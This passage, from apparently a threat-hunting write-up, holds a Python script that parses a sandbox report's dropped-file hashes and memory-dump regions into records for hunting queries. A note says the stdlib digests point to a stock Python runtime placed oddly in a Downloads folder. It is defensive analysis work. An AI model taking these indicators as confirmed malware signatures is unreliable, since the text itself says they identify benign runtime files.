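    "| SHA1 | c7300975df267b1d6adcbac0ac93fd7b1ab49bd2 |",
    "| SHA256 | eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a |",
    "| SHA512 | 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978 |",
    "memory/4268-11415-0x000001F97D710000-0x000001F97D71F000-memory.dmp",
    "memory/516-11467-0x000001CE76FA0000-0x000001CE76FB0000-memory.dmp",
    r"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences",
    "| MD5 | ac38483b1e9d56556195c2019e9d0a32 |",
    "| SHA1 | 885f52fe21df71bb3b2bd958809eb395c9b42571 |",
    "| SHA256 | e08570b014c5d188e6df8c0c853bae0df484e3f44c28d1d25373b03b3bd5f7d1 |",
    "| SHA512 | f12eef6c36f281094f597496761c74901e4ab526bca427692563b2d203d7891d400204e7cc3bcfe2e854df2a07a8fcfbe4dee094e485556d82a34004ea38834c |",
]

# Expected hex-digit counts; a digest of any other length is a copy error,
# not an indicator, and must not be fed into a blocklist.
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
ROW_RE = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9A-Fa-f]+)\s*\|$")
DUMP_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")


@dataclass
class DroppedFile:
    path: str
    hashes: dict = field(default_factory=dict)   # algorithm -> lowercase hex


@dataclass
class MemoryRegion:
    pid: int
    seq: int
    start: int
    end: int

    @property
    def size(self) -> int:
        return self.end - self.start


def parse_report(lines):
    """Turn the flattened listing into DroppedFile and MemoryRegion records.

    A hash row attaches to the most recent path line; a dump line ends the
    current file so a stray hash row after it is reported rather than
    silently attached to the wrong file.
    """
    files, regions, current = [], [], None
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if m:
            if current is None:
                raise ValueError(f"hash row without a preceding path: {line}")
            algo, digest = m.group(1), m.group(2).lower()
            if len(digest) != HASH_LEN[algo]:
                raise ValueError(
                    f"{algo} for {current.path} has {len(digest)} hex chars, "
                    f"expected {HASH_LEN[algo]}")
            current.hashes[algo] = digest
            continue
        m = DUMP_RE.match(line)
        if m:
            current = None
            regions.append(MemoryRegion(int(m.group(1)), int(m.group(2)),
                                        int(m.group(3), 16), int(m.group(4), 16)))
            continue
        current = DroppedFile(line)      # anything else is a dropped-file path
        files.append(current)
    return files, regions


def sha256_set(files):
    """SHA-256 values suitable for a hunting query."""
    return {f.hashes["SHA256"] for f in files if "SHA256" in f.hashes}


def files_under(files, prefix):
    """Files whose path lies beneath prefix (case-insensitive, as NTFS is)."""
    p = prefix.lower().rstrip("\\") + "\\"
    return [f for f in files if f.path.lower().startswith(p)]


if __name__ == "__main__":
    files, regions = parse_report(SAMPLE_LINES)
    for f in files:
        print(f.path, f.hashes["SHA256"])
    for r in regions:
        print(f"pid {r.pid}: {r.size:#x} bytes at {r.start:#x}")
```

The stdlib entries (types.py, struct.py, base64.py and their .pyc files) are stock CPython components, so their digests identify a Python 3.12 runtime rather than malicious code; hunt on the unusual location, a full interpreter under a user's Downloads folder, and keep the per-file hashes as corroboration rather than as standalone block entries.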